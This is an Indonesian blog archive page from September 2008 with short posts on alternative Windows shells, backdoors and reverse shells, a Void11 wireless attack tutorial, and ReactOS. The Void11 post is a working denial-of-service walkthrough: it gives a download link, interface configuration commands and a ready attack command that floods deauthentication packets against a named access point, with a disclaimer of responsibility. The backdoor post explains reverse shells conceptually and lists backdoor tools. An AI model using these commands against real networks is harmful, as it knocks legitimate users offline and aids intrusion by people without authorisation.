Arsip

Archive for September, 2008

Shell alternatif untuk Windows

September 29, 2008 1 komentar

Kembali lagi bersama saya, Satrio Adi Rukmono, dalam topik yang berhubungan dengan dunia sistem operasi, untuk kali ini Microsoft Windows. Setelah membaca topik ini Anda akan dapat mengubah tampilan sistem operasi yang satu ini (khususnya versi 2000/XP) menjadi tidak dikenali lagi. Huahahahahahaha…

Perubahan yang akan Anda lihat tidak sekedar mengganti visual style, meng-edit bootscreen, atau logon screen. Bahkan, saya tidak akan membahas mengenai ketiga hal tersebut di sini. Yang akan saya bahas di sini melingkupi shell alternatif untuk Windows. Apa itu shell? Baca selanjutnya…

Iklan

Backdooring

September 14, 2008 Tinggalkan komentar

Nah ketemu lagi dgn topik ttg network security. Sekarang kita akan bahas tentang Backdooring. Pastinya kebayang donk maksudnya apa. Ibarat maling kalo berhasil masuk rumah korban pastinya klo ntar2 dia mw masuk lagi g mungkin donk lewat jalan yg sama (yg biasanya sih lbh susah). Pastinya dia siapin entah gimana caranya jalan lain yg spy dia gmpang masuk lagi, ex : lwt bawah tanah, atap atw gemboknya dirusak sm dia. Nah analogi ini sm juga dgn cara attacker utk menembus sistem yg sdh pernah berhasil dia lumpuhkan.

Jenis-jenis backdoor sendiri ad banyak macemnya. Contohnya kyk :
1. Program yg diinstall sm attacker -> back orifice, sshv4
2. Program/file yg dimodifikasi -> OpenSSH backdoor
3. Plugins -> cgi-telnet, php shell
4. Program binary yg dieksekusi -> bindshell

Untuk kali ini, saya akan ngebahas sedikit tentang salah satu teknik dalam backdooring, namanya Reverse Shell. Jadi nih teknik sebenarnya digunakan klo kita ketemu dg firewall yg dikonfigurasi dgn “full restriction inbound traffic”. Maksudnya adalah si firewall ini akan memfilter segala macam paket/koneksi dr luar yg ingin masuk ke dlm dengan ACL (Access Control List) yg sdh disetting sebelumnya. Namun tdk sebaliknya, koneksi dr dalam keluar tidak difilter sm si bang firewall ini 😀 (hohoho).

Ini ilustrasinya :

Di sini attacker memasang reverse shell backdoor di komputer server setelah berhasil melakukan koneksi melalui port 80 (HTTP)

 

Kemudian si attacker mengeksekusi reverse shell backdoor di mesin target n terjadilah koneksi dari dalam ke luar…

Yup segitu aja dulu corat-coret dr saya. Tunggu tulisan2 berikutnya yg dijamin lbh menarik :D.

CU !

Kategori:Hacking, Security

Melumpuhkan Access Point dg Void11…

September 5, 2008 1 komentar

Yups, bagi yg seneng dg dunia security, apapun status kamu (Black atau White Hat :p), saya mw sedikit mengenalkan salah satu aplikasi yg dpt melakukan mass flooding utk Access Point (DoS) : Void11.

Void11 memiliki beberapa jenis metode attack, yaitu :

1. Deauthenticate Clients (default mode)
Dengan metode ini, void11 akan melakukan flooding WLAN dengan ‘deauthentication packets’ sehingga
client yang terautentikasi didalam jaringannya akan ngedrop dan terputus dari jaringan WLAN.

2. Authentication Flood
Dengan metode ini, void11 akan melakukan flooding ke Access Point dengan ‘authentication packets (random client MACs)’

3. Association Flood
Dengan metode ini, void11 akan melakukan flooding dengan association packets (random client MACs)

Nah, tadi kan teorinya, sekarang waktunya untuk berkotor-kotor ria!
Apa aja yg perlu disiapkan?
– komputer atw laptop yang udah ada wificard dengan chipset Prism.
– Wardriving utk mendapatkan MAC Address + SSID AP si target
– Donlod void11 dari : http://lirva32.org/images/void11-0.2.0.tar.bz2

Nah ini konfigurasinya :

cd /tools/wifi/void11-0.2.0/console
iwconfig wlan0 mode master
iwpriv wlan0 hostapd 1
./void11_hopper

alternatif void_hopper mode juga bisa menggunakan :
iwconfig wlan0 channel 6 (set card to channel 6)


Penggunaan :
void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]


Penyerangan :

Misalkan saja kita ingin melakukan penyerangan terhadap sebuah AP, maka saya awali dulu dengan melakukan wardriving…untuk hal ini bisa pakai “kismet”
Dari hasil wardriving didapatkan :

SSID : linksys
mAC : 00:06:BF:64:AB:35


Siapakan penyerangan sbb :

void11_penetration wlan0 -D -t 1 -S linksys -B 00:06:BF:64:AB:35

And, where we go…!!  AP-nya nge-drop. :D. Cukup simpel kan!?

Btw, saya tdk bertanggung jawab ya atas akibat yg ditimbulkan dr tutorial ini.

Selamat mencoba…

ReactOS: Windows XP Gratis?

September 3, 2008 2 komentar

screenshot ReactOS 0.3.3 shell

Sistem operasi apa yang Anda gunakan? Windows XP atau Vista keluaran Microsoft? Ubuntu, Fedora Core, atau salah satu dari ratusan distro Linux lainnya? MacOS X dari Apple? Kombinasi dari dua sistem operasi? Atau malah tiga atau lebih? Baca selanjutnya…